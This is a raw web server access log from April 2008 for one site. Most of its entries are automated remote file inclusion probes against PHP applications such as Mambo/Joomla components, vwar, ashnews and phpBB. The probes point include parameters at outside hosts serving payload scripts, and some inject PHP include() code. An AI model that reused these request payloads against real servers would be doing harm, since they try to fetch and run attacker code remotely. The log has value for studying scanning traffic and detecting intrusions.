209.163.169.99 - - [01/Apr/2008:09:52:46 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:09:52:46 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:52:46 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:52:46 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:09:52:49 -0700] "GET /logs/access_080128.log/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:09:52:49 -0700] "GET /logs/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:09:52:54 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:09:52:55 -0700] "GET //ashnews.php?pathtoashnews=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:09:52:56 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.243.102 - - [01/Apr/2008:09:53:05 -0700] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.17.26 - - [01/Apr/2008:09:53:05 -0700] "GET //ashnews.php?pathtoashnews=http://www.pressurekru.co.uk/images/profile/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:53:28 -0700] "GET /logs/access_080112.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:53:54 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:53:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:53:58 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:53:58 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:54:20 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:54:23 -0700] "GET /logs/access_080225.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:09:54:57 -0700] "GET /logs/access_080215.log/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:55:03 -0700] "GET /enc/content.php?Home_Path=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:55:03 -0700] "GET /logs/enc/content.php?Home_Path=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:09:55:04 -0700] "GET /logs/access.log/error.php?error=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:09:55:05 -0700] "GET /logs/error.php?error=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:09:55:07 -0700] "GET /logs/access_080228.log/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:09:55:08 -0700] "GET /logs/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:55:10 -0700] "GET /error.php?error=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.117.79 - - [01/Apr/2008:09:55:10 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.perfecttransportation.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:09:55:20 -0700] "GET /logs/access.log/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.77 - - [01/Apr/2008:09:55:31 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.244.77 - - [01/Apr/2008:09:55:37 -0700] "GET /logs/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:55:46 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:56:22 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.171 - - [01/Apr/2008:09:56:27 -0700] "GET /funny/?D=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:56:28 -0700] "GET /logs/access_080225.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:56:28 -0700] "GET /logs/access_080112.log//modules/vwar/admin/admin.php?vwar_root=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:56:59 -0700] "GET /logs///classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:56:59 -0700] "GET ///classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
217.195.192.40 - - [01/Apr/2008:09:57:26 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.59.22.92 - - [01/Apr/2008:09:57:31 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.59.22.92 - - [01/Apr/2008:09:57:32 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.59.22.92 - - [01/Apr/2008:09:57:32 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:57:48 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:09:58:06 -0700] "GET //index.php?pageurl=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:16 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:16 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:17 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:17 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:17 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:58:17 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:58:32 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:58:42 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:58:48 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:58:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:58:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:59:13 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:59:18 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:59:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.10.128.138 - - [01/Apr/2008:09:59:19 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.128.138 - - [01/Apr/2008:09:59:19 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:59:25 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:10:01:01 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:10:01:01 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:10:01:01 -0700] "GET /modifyform.html?code=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:10:01:01 -0700] "GET /modifyform.html?code=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:10:01:02 -0700] "GET /logs/modifyform.html?code=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:10:01:02 -0700] "GET /logs/modifyform.html?code=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.166 - - [01/Apr/2008:10:01:16 -0700] "GET /logs/access_080201.log/%034administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:10:01:16 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.166 - - [01/Apr/2008:10:01:17 -0700] "GET /logs/%034administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:10:01:18 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:10:01:34 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:10:01:39 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:10:01:39 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.80.249.160 - - [01/Apr/2008:10:01:43 -0700] "GET / HTTP/1.1" 200 3362 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
219.239.89.26 - - [01/Apr/2008:10:01:50 -0700] "GET /index.php?s=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.1.62.200 - - [01/Apr/2008:10:02:03 -0700] "GET /index2.php?http://www.archfuck.ru/administrator/components/com_remository/zell.txt??http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.1.62.200 - - [01/Apr/2008:10:02:06 -0700] "GET /logs/index2.php?http://www.archfuck.ru/administrator/components/com_remository/zell.txt??http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:02:21 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:02:21 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:02:22 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:10:02:24 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:10:02:25 -0700] "GET //ashnews.php?pathtoashnews=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:10:02:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:02:27 -0700] "GET /logs/index.php?name=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:02:32 -0700] "GET /index.php?name=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:10:02:34 -0700] "GET /logs/access_071230.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.31.126 - - [01/Apr/2008:10:02:36 -0700] "GET /minamijewelry/source_images/batch1/?S=D HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:10:02:59 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.25.58.2 - - [01/Apr/2008:10:03:30 -0700] "GET /logs/access_071126.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.25.58.2 - - [01/Apr/2008:10:03:31 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.25.58.2 - - [01/Apr/2008:10:03:31 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.25.58.2 - - [01/Apr/2008:10:03:47 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.10.243.102 - - [01/Apr/2008:10:04:35 -0700] "GET /logs/access_080215.log//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.243.102 - - [01/Apr/2008:10:04:35 -0700] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:04:55 -0700] "GET /index3.php?path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:04:55 -0700] "GET /logs/index3.php?path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:05:09 -0700] "GET /index.php?pagina=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:05:10 -0700] "GET /logs/index.php?pagina=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:10:05:21 -0700] "GET /logs/access_080117.log/login.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:10:05:21 -0700] "GET /login.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:10:05:21 -0700] "GET /logs/login.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:05:48 -0700] "GET /index3.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:05:48 -0700] "GET /logs/index3.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.1.62.200 - - [01/Apr/2008:10:05:48 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
